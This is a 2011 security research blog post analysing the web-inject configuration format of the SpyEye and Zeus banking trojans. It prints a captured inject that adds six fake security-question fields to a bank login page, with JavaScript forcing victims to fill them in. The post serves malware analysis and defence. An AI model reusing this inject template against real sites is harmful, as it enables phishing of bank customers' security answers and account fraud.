Sunday, July 3, 2011

(SpyEye & Zeus) Web Injects - Parameters

We are in the process of analyzing the enormous set of web injects log and real client side code. During analysis, we found that third generation botnets (Zeus and SpyEye) use an explicit technique of injecting rogue content in the web pages of bank websites. The content is injected as inline but the plugins that are used to complete this process follows a certain set of parameters and procedure. In this post, we are going to talk about the metrics that are used to perform web injects successfully. The plugin communicates with installed bot on client side and a specific steps are followed as a part of hierarchical infection in order to trick the browser.

The installed bot understands the following parameters

1. set_url [Target to inject]
The set_url parameter instantiates an object which points to the website which is aimed for web injects. The bot uses this parameter to scan through the HTTP requests for possible match of the website so that injection can be done.

2. data_before / data_end
These parameters are used to set the injection code in an appropriate manner so that HTML code looks fine and does not show broken tags. Generally, these parameters define the base of web inject because the injected data comprises of the HTML tags to be injected before the main injection. Further, "data_before / data_end" also points before which HTML tag the data is required to be injected.

3. data_inject | data_end
These parameters are the main killing part in which the real web injects are placed. The rogue or non legitimate JavaScript/HTML code is set in these parameters which is injected in the legitimate bank website or any proprietary financial web site.

4. data_after | data_end
These are last set of parameters which are used to complete the web injects by placing requisite HTML tags at the end of web injects code. Again the purpose is to render the HTML code successfully and inline with the main webpage of website.

These collective set of parameters can also be used to inject multiple code in the target website.

One of the real time injected code is presented below
set_url https://target_website/login.html* GP
data_before
name="password"*[/tr]
data_end
data_inject
[TD][FONT class=userinfo] What is your favourite meal or restaurant? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q1] [/TD][/TR]
[TD][FONT class=userinfo] The name of a memorable place to you? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q2] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite film of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q3] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite book of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q4] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite teacher or subject? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q5] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite TV star or show? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q6] [/TD][/TR]

data_end
data_after
data_end


data_before
var cusID*;
data_end
data_inject


if (document.forms[0].q1.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q1.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q2.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q2.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q3.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q3.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q4.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q4.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q5.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q5.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q6.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q6.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}

data_end
data_after
data_end


These examples clarify the fact that how exactly the web injects code works and is rendered in the webpages by the installed bot.

SpyEye Malware Infection Framework - VB


We have just release the first part of our research on SpyEye in Virus Bulletin Magazine. The next part of the research will be coming soon.

VB - SpyEye Malware Infection Framework